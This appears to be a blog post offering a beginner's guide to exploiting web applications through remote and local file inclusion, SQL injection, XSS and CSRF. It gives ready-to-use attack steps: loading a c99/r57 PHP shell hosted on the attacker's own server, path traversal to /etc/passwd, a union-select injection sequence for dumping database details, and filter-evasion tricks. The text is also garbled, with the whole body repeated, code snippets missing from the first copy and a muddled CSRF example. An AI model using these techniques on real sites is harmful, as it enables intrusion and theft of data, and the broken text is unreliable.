1. Basic Terms and Words:-
-Vulnerability : A security hole that can be exploited to change files or gain access to the server.
-Database is a place were information such as users, posts, polls, and other variables and unique info are stored. Usually used in SQL.
-Exploit : Anything that lets someone use a vulnerability to their advantage.
-RFI “Remote File Inclusion” : When a web script allows access to a remote file or page, usually used to get a shell such as c99.
-LFI “Local File Inclusion” : When a user can access a local file on the server that is not meant to be seen.
-SQL Injection : Injecting MySQL/MSSQL strings into a URL in order to gain more information and access to SQL databases and user information.
-XSS “Cross Site Scripting” : Cross Site Scripting is when a website does not properly parse data. It can be used to steal cookies and sessions.
-CSRF “Cross Site Request Forgery” : An attack that forces a logged-on victim’s browser to send a request to a vulnerable web application, which then performs the chosen action on behalf of the victim.
2. Explanation of Attacks
RFI Exploit-
In an RFI exploit, the web application allows access to pages that are not local, and are off of the server. For example, lets say you are browsing a site and the URL is http://www.example.com/index.php?page=news, and when you go to their contact page it changes to http://www.example.com/index.php?page=contact. This is were the vulnerability first starts. Most of the time, the script will be coded in such a way that it will ignore requests such as these, but if the coder was being lazy and has no clue about security, he might of used:
Now, if there is a large problem with the code. Because this code is here, you are able to load remote pages on http://www.example.com. A quick way to try this would be to do http://www.example.com/index.php?page=google.com. If Google successfully loads, the site in question is vulnerable to an RFI attack. One of the most useful ways to take advantage of an RFI would be to use a PHP shell. Some of the most popular ones currently used are c99 and r57. There are easily found around the internet, so coming across a PHP shell should be no problem. To go about doing this, your PHP shell needs to be hosted on another server as a text file. If you keep the .php extension on your shell, it will try executing on YOUR server instead of the remote server. To use the shell on the remote server, just add it to your URL like this:
http://www.example.com/index.php?pag…….rshell.txt The RFI is now complete.
LFI Exploit-
The base of an LFI exploit yet again is poorly coded PHP that does not sanitize varibles before they reach the webpage. An example of PHP code that would allow an LFI to occur would be:
You want to reach the passwd file, so you would need to move down a few directories. In order to see if the LFI works, you can try page=../../../../../../../etc/passwd. The number of ../ depends on how many folders you need to travel through. The “..” goes down a folder so try playing around with it. Once you reach the passwd file, hopefully the password will be there. If it is not the password will be in /etc/shadow which is only available with root access. The passwd file is accessible because many applications depend on it. Some other good files to look through are Apache logs and other types of logs and config files.
SQL Injections-
For this section, I am going going to be focusing on MySQL injections, and not MSSQL. There are a few important commands you need to know before you start using SQL injections:
‘union all select’: Combines all select statements into one and shows all rows
‘order by’: Tells SQL how to order the rows and columns once you enter a command
‘load_file()’: Loads a local file from the server such as /etc/passwd
‘char()’: Used when normal symbols can’t be used, for example when you are trying to evade a filter
‘concat()’: Takes the output of multiple columns and places them into a single column. You will see how useful this is later on.
‘–’: Comment
Once you have a basic understanding of the commands, it is time to inject a site. To start, lets see if we can run our own commands snd queries. As an example site, lets use http://www.example.com/index.php?=5. To see if we can run our own queries try these commands:
-You can hex encode the characters, as long as the server and your browser still interpret them correctly.
-Try mixing up the case of your queries, use all caps or a mix to see if there is a case filter.
-You can split up words with a + sign, like “nu+ll un+ion all sel+ect”
XSS Attacks-
Personally, when it comes to XSS attacks, I have not used them very much. They can be very useful if you want to steal a users cookie or session in order to gain access to off-limit areas. Since I have not had much experience with XSS, I will give a brief summary of the different methods they can be used. First, in order to see if a site is able to be exploited from an XSS attack, you must first see if they work. In order to do this, you could enter 1 of 2 of the following lines into a form (search bar, comment fields, login fields, etc.) on the site:
If the page is displayed with either a large heading that says “test” or has a pop-up alert, you know that the XSS works.
Doing this will show if the site is vulnerable to either HTML or JavaScript, both of which are useful. XSS is currently a growing way of exploiting web sites which is very useful while social engineering. XSS exploits have been found on MANY major websites, such as CBS.com to name one.
CSRF Attacks-
A CSRF exploit is an attack that forces a logged-on victim’s browser to send a request to a vulnerable web application, which then performs the chosen action on behalf of the victim. They are starting to become more widely used, but they are easily defeated with a confirmation page. Here is an example of how they could be used:
Lets say that we want to add a user in a forum software, and the command to do that is knew that the page to delete a user was admin/deleteuser.php?user=name (were name is the wanted username). As a normal member, we do not have the rights to create a new user, so we need an admin to. A way to do this would be to make an admin of the forum click on a link that redirects him to admin/deleteuser.php?user=name, then making him create the user without him knowing. By doing this, you are basically tricking the admin into creating a new user. The one problem with CSRF attacks are that they can be easily defeated with a simple confirmation page asking the admin if they want to perform the action, and a “Yes” and “No” box.
3. Conclusion
This paper is meant to be an article and easy to use reference guide to today most popular ways of remotely exploiting web applications. This guide can be used as a starting point to spark interest into certain types of exploits, and a way to gain knowledge about them.
-Vulnerability : A security hole that can be exploited to change files or gain access to the server.
-Database is a place were information such as users, posts, polls, and other variables and unique info are stored. Usually used in SQL.
-Exploit : Anything that lets someone use a vulnerability to their advantage.
-RFI “Remote File Inclusion” : When a web script allows access to a remote file or page, usually used to get a shell such as c99.
-LFI “Local File Inclusion” : When a user can access a local file on the server that is not meant to be seen.
-SQL Injection : Injecting MySQL/MSSQL strings into a URL in order to gain more information and access to SQL databases and user information.
-XSS “Cross Site Scripting” : Cross Site Scripting is when a website does not properly parse data. It can be used to steal cookies and sessions.
-CSRF “Cross Site Request Forgery” : An attack that forces a logged-on victim’s browser to send a request to a vulnerable web application, which then performs the chosen action on behalf of the victim.
2. Explanation of Attacks
RFI Exploit-
In an RFI exploit, the web application allows access to pages that are not local, and are off of the server. For example, lets say you are browsing a site and the URL is http://www.example.com/index.php?page=news, and when you go to their contact page it changes to http://www.example.com/index.php?page=contact. This is were the vulnerability first starts. Most of the time, the script will be coded in such a way that it will ignore requests such as these, but if the coder was being lazy and has no clue about security, he might of used:
Now, if there is a large problem with the code. Because this code is here, you are able to load remote pages on http://www.example.com. A quick way to try this would be to do http://www.example.com/index.php?page=google.com. If Google successfully loads, the site in question is vulnerable to an RFI attack. One of the most useful ways to take advantage of an RFI would be to use a PHP shell. Some of the most popular ones currently used are c99 and r57. There are easily found around the internet, so coming across a PHP shell should be no problem. To go about doing this, your PHP shell needs to be hosted on another server as a text file. If you keep the .php extension on your shell, it will try executing on YOUR server instead of the remote server. To use the shell on the remote server, just add it to your URL like this:
http://www.example.com/index.php?pag…….rshell.txt The RFI is now complete.
LFI Exploit-
The base of an LFI exploit yet again is poorly coded PHP that does not sanitize varibles before they reach the webpage. An example of PHP code that would allow an LFI to occur would be:
Quote:$page = $_GET[page];Now, an LFI is used to access files that are already on a server, a good target on a Unix server would be the passwd file in /etc. This vulnerability is similar to an RFI, and uses much of the same techniques. For example, a page called http://www.example.com/index.php=index could be used in an LFI depending on the code.
@include($page);
?>
You want to reach the passwd file, so you would need to move down a few directories. In order to see if the LFI works, you can try page=../../../../../../../etc/passwd. The number of ../ depends on how many folders you need to travel through. The “..” goes down a folder so try playing around with it. Once you reach the passwd file, hopefully the password will be there. If it is not the password will be in /etc/shadow which is only available with root access. The passwd file is accessible because many applications depend on it. Some other good files to look through are Apache logs and other types of logs and config files.
SQL Injections-
For this section, I am going going to be focusing on MySQL injections, and not MSSQL. There are a few important commands you need to know before you start using SQL injections:
‘union all select’: Combines all select statements into one and shows all rows
‘order by’: Tells SQL how to order the rows and columns once you enter a command
‘load_file()’: Loads a local file from the server such as /etc/passwd
‘char()’: Used when normal symbols can’t be used, for example when you are trying to evade a filter
‘concat()’: Takes the output of multiple columns and places them into a single column. You will see how useful this is later on.
‘–’: Comment
Once you have a basic understanding of the commands, it is time to inject a site. To start, lets see if we can run our own commands snd queries. As an example site, lets use http://www.example.com/index.php?=5. To see if we can run our own queries try these commands:
Quote:/index.php?id=5 and 1=0–and if that does not work you can try
Quote:/index.php?id=’The latter of the two is usually faster and provides the same results. If this is successful, the page should either turn blank or display an MySQL error. If it does not do either of them, it could be a Blind SQL Injection. This is not being covered in this guide, so we are going to stick with basic SQL Injections. Moving on, if the page changed or became blank, the site could be vulnerable. We want to find how many columns there are and which ones are showing so we use the command:
Quote:/index.php?id=5 order by 20–If you get an error with “5 order by 20″ then decrease and increase the last number like this:
Quote:/index.php?id=5 order by 15–For example, if the page loads correctly with “5 order by 12″ but you get an error with “5 order by 13″, that means that there are 12 collumns. Now, in order to view them you must use “union all select” like this:
Quote:/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12–Now that the query has worked, lets go ahead and look at the columns. Lets say that columns 2,5,6 are the most visible and largest. We want to gain information about the server’s MySQL, so lets do the following commands:
Quote:/index.php?id=null union all select 1,@@version,3,4,user(),database(),7,8,9,10,11,12–As you should now be able to see, the commands have displayed data about the MySQL server and database/user information. This is great, but there is a way to output all of the data in one column to make it neater and easier to read. In order to do this, we need to use concat() that is described at the beginning of the section like this:
Quote: /index.php?id=null union all select 1,concat(user(),char(58),database(),char(58),versi on()),3,4,5,6,7,8,9,10,11,12–We are only using 1 column because concat() allows us to put all the information into one. This is all the MySQL I am going to be covering in this article. Up to this point, you have learned that your target is very vulnerable. If you encounter any problems, use the following tips for filter evasion:
-You can hex encode the characters, as long as the server and your browser still interpret them correctly.
-Try mixing up the case of your queries, use all caps or a mix to see if there is a case filter.
-You can split up words with a + sign, like “nu+ll un+ion all sel+ect”
XSS Attacks-
Personally, when it comes to XSS attacks, I have not used them very much. They can be very useful if you want to steal a users cookie or session in order to gain access to off-limit areas. Since I have not had much experience with XSS, I will give a brief summary of the different methods they can be used. First, in order to see if a site is able to be exploited from an XSS attack, you must first see if they work. In order to do this, you could enter 1 of 2 of the following lines into a form (search bar, comment fields, login fields, etc.) on the site:
Code:
" or ""Doing this will show if the site is vulnerable to either HTML or JavaScript, both of which are useful. XSS is currently a growing way of exploiting web sites which is very useful while social engineering. XSS exploits have been found on MANY major websites, such as CBS.com to name one.
CSRF Attacks-
A CSRF exploit is an attack that forces a logged-on victim’s browser to send a request to a vulnerable web application, which then performs the chosen action on behalf of the victim. They are starting to become more widely used, but they are easily defeated with a confirmation page. Here is an example of how they could be used:
Lets say that we want to add a user in a forum software, and the command to do that is knew that the page to delete a user was admin/deleteuser.php?user=name (were name is the wanted username). As a normal member, we do not have the rights to create a new user, so we need an admin to. A way to do this would be to make an admin of the forum click on a link that redirects him to admin/deleteuser.php?user=name, then making him create the user without him knowing. By doing this, you are basically tricking the admin into creating a new user. The one problem with CSRF attacks are that they can be easily defeated with a simple confirmation page asking the admin if they want to perform the action, and a “Yes” and “No” box.
3. Conclusion
This paper is meant to be an article and easy to use reference guide to today most popular ways of remotely exploiting web applications. This guide can be used as a starting point to spark interest into certain types of exploits, and a way to gain knowledge about them.
0 comments:
Post a Comment